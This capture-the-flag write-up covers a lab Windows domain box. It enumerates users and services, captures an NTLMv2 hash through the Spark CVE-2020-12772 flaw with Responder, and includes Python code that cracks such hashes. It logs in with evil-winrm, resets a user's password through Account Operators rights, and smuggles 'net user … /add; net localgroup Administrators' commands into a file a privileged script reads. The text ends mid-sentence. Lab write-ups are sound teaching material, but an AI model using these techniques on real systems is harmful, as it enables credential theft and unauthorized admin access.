CTF Ra

nmap

nmap -Pn -vvv -T5 -p- -sC -sV 10.10.94.80

The scan is not over yet, but we already have a lot of open ports:

Ports 80, 445 and 135 should be interesting.

host

On the web page we can see the host in the network analyzer:

I need to add it to /etc/hosts

fire.windcorp.thm

openfire

On fire.windcorp.thm:9090 we have a login panel.

I’ve tried to exploit it with Metasploit, but it’s not working, so I should continue the enumeration.

Port 80

I found some users on the main page:

This is the default string when I curl the web page:

curl -S http://10.10.94.80 | grep xmpp

curl -S http://10.10.94.80 | grep xmpp | cut -d ':' -f 4 |cut -d '@' -f 1

Output:

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
sadswan869
whiteleopard529
happymeercat399
orangegorilla428
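The cut pipeline above depends on the exact field positions of the href and keeps duplicates (sadswan869 shows up twice). As an added example that is not part of the original write-up, here is a small Python parser that pulls the same kind of user list out of the HTML by looking at every xmpp: link instead; the HTML below is constructed to resemble the page, not copied from it.

```python
from html.parser import HTMLParser

# Constructed sample of the kind of markup the curl | grep xmpp pipeline was
# parsing (an illustration, not the real page content).
SAMPLE_HTML = """
<div class="team">
  <a href="xmpp:organicfish718@fire.windcorp.thm">Organic Fish</a>
  <a href="xmpp:buse@fire.windcorp.thm">Buse</a>
  <a href="XMPP:Edeltraut@fire.windcorp.thm">Edeltraut</a>
  <a href="xmpp:sadswan869@fire.windcorp.thm">Sad Swan</a>
  <a href="xmpp:sadswan869@fire.windcorp.thm">Sad Swan (again)</a>
  <a href="mailto:it@windcorp.thm">IT</a>
</div>
"""


class XmppLinkParser(HTMLParser):
    """Collect the href of every <a> whose scheme is xmpp (case-insensitive)."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value and value.lower().startswith("xmpp:"):
                self.links.append(value)


def xmpp_users(html: str):
    """Return (local_part, domain) pairs, unique, in first-seen order."""
    parser = XmppLinkParser()
    parser.feed(html)
    seen = []
    for link in parser.links:
        jid = link.split(":", 1)[1]       # strip the xmpp: scheme
        jid = jid.split("?", 1)[0]        # drop any ?message=... query part
        local, _, domain = jid.partition("@")
        pair = (local, domain.lower())
        if pair not in seen:              # dedupe, keep the page's order
            seen.append(pair)
    return seen


def usernames(html: str):
    """Just the local parts, i.e. the candidate account names for later password attacks."""
    return [local for local, _ in xmpp_users(html)]


if __name__ == "__main__":
    for name in usernames(SAMPLE_HTML):
        print(name)
```

The same parser works on the real page by replacing SAMPLE_HTML with the body returned by curl; the domain part is kept because it tells you which XMPP server (fire.windcorp.thm) the users belong to.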

Maybe it will be useful later:

Reset password

http://fire.windcorp.thm/reset.asp


We have 4 questions.
The picture of Lily is named lilyleAndSparky.jpg.


She’s not in the user list above; the user is lilyle and the dog is Sparky.

feroxbuster

On http://10.10.94.80


Nothing interesting.

DNS

dig @10.10.94.80 windcorp.thm any

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://windcorp.thm' -H "Host: FUZZ.windcorp.thm" --hh 11334

Nothing interesting with feroxbuster.

Let’s add hostmaster.windcorp.thm to /etc/hosts.

smb

I will use the creds we’ve got above to enumerate the shares:

python /usr/bin/smbmap.py -H 10.10.85.194 -R -u "lilyle" -p "ChangeMe#1234"

smbclient //10.10.85.194/Shared -U "lilyle"
get "Flag 1.txt"

The share contains the installation files of Spark 2.8.3, which is affected by CVE-2020-12772:
https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
I have to install version 2.8.3; I had a few errors on Arch and needed to install a lot of packages.

Install spark


I need to add a repository:

Ok no problem.

Now I’m ready:


I’ve also tried building from source, but it doesn’t see the new version of Java, so I can’t switch.

Let’s try on Windows:

Now I’m on Windows and Arch at the same time with one VPN.
I will use Arch as a router:

Local network card:

2: enp34s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 2c:f0:5d:06:9e:da brd ff:ff:ff:ff:ff:ff
inet 192.168.1.69/24 brd 192.168.1.255 scope global dynamic noprefixroute enp34s0
valid_lft 31033sec preferred_lft 31033sec

VPN:

7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.8.50.167/16 scope global tun0
valid_lft forever preferred_lft forever
# forwarding must be on for the FORWARD rules to matter; eth1 is assumed to be the interface the Windows box reaches Arch through
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
sudo iptables -A FORWARD -i eth1 -o tun0 -j ACCEPT
sudo iptables -A FORWARD -i tun0 -o eth1 -m state --state RELATED,ESTABLISHED -j ACCEPT

This config is not persistent, which is what I want.

Exploit

sudo responder -I tun0

Then, in Spark, log in with the user lilyle and the password ChangeMe#1234:
We need to add the host conference.fire.windcorp.thm to the hosts file.

It’s using XMPP, so I’ve added Buse, the XMPP user from the website.
I didn’t know how to add him correctly and I had a lot of network errors, so I sent the message to everyone.


It was this message with the IP of Arch:

Then responder gave me the hash.

[HTTP] NTLMv2 Client   : 10.10.85.194
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : buse::WINDCORP:688309f4810f…
[*] Skipping previously captured hash for WINDCORP\buse

Yeah! This is how I feel:

Crack the hash


uzunLM+3131
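The write-up does not show the cracking step, so here is an added example (not code from the original post) of what a NetNTLMv2 cracker such as hashcat -m 5600 computes for every candidate password: the NT hash (MD4 of the UTF-16LE password), the NTLMv2 key (HMAC-MD5 of the upper-cased user name plus domain under that NT hash), and finally the NTProofStr over the server challenge and the client blob, which is compared with the proof in the captured line. The Responder line it cracks is constructed: user, domain and password are the ones from this box, but the server challenge and blob are made-up values, not the captured ones.

```python
import hmac
import struct

M32 = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & M32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Implemented here because hashlib.new("md4") is often
    unavailable on OpenSSL 3 builds, and the NT hash is MD4."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)      # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = [a, b, c, d]
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                r[0] = _rol((r[0] + fn(r[1], r[2], r[3]) + X[idx] + k) & M32, shifts[i % 4])
                r = [r[3], r[0], r[1], r[2]]     # next step updates what was d
        a, b, c, d = ((a + r[0]) & M32, (b + r[1]) & M32, (c + r[2]) & M32, (d + r[3]) & M32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the key NTLMv2 is derived from."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(user: str, domain: str, password: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the client computes it (MS-NLMP 3.3.2):
    HMAC-MD5(HMAC-MD5(NThash, upper(user) + domain), challenge || blob)."""
    identity = (user.upper() + domain).encode("utf-16-le")
    ntlmv2_key = hmac.new(nt_hash(password), identity, "md5").digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, "md5").digest()


def responder_line(user, domain, password, server_challenge, blob) -> str:
    """Format a capture the way Responder prints NTLMv2
    (used here only to build the constructed sample below)."""
    proof = ntlmv2_proof(user, domain, password, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_responder_line(line: str, candidates):
    """Try each candidate password against one Responder NTLMv2 line and
    return the match, or None. This is what hashcat -m 5600 does, only slower."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    chal, proof, blob = (bytes.fromhex(h) for h in (chal_hex, proof_hex, blob_hex))
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(user, domain, pw, chal, blob), proof):
            return pw
    return None


# Constructed sample: user, domain and password come from the write-up, but the
# server challenge and client blob are made up here (not the captured values).
_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = bytes.fromhex("0101000000000000"   # blob header: RespType, HiRespType, reserved
                      "0000000000000000"   # timestamp (zeroed in this constructed blob)
                      "a1b2c3d4e5f60718"   # client challenge
                      "00000000")          # reserved; AV pairs omitted in this constructed blob
SAMPLE_LINE = responder_line("buse", "WINDCORP", "uzunLM+3131", _CHALLENGE, _BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack_responder_line(SAMPLE_LINE, ["Password1", "Winter2020", "uzunLM+3131"]))
```

For a real capture you would paste Responder's line into a file and run hashcat -m 5600 (or john --format=netntlmv2) against a wordlist; the per-candidate work is exactly the three HMAC/MD4 steps above, which is why NetNTLMv2 cracks quickly for weak passwords.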

win-rm

evil-winrm -u buse -p uzunLM+3131 -i 10.10.85.194

Check the privs:

whoami /all


https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

We are in BUILTIN\Account Operators, which could be interesting.

The script is using the account brittanycr, and Account Operators can reset the password of accounts that are not administrators, so we can change the password of this account.

net user /domain brittanycr qweqweqweQWE123!

SMB

python /usr/bin/smbmap.py -H 10.10.85.194 -R -u "brittanycr" -p 'qweqweqweQWE123!'

The script uses this file as this user.
We have to download it, modify it, then upload it back.
smb

smbclient //10.10.85.194/Users -U "brittanycr"

I’m adding this to the hosts file:

net user peanutstick peanutstick123! /add;net localgroup Administrators peanutstick /add

net user sid hello!123 /add;net localgroup Administrators sid /add

then, use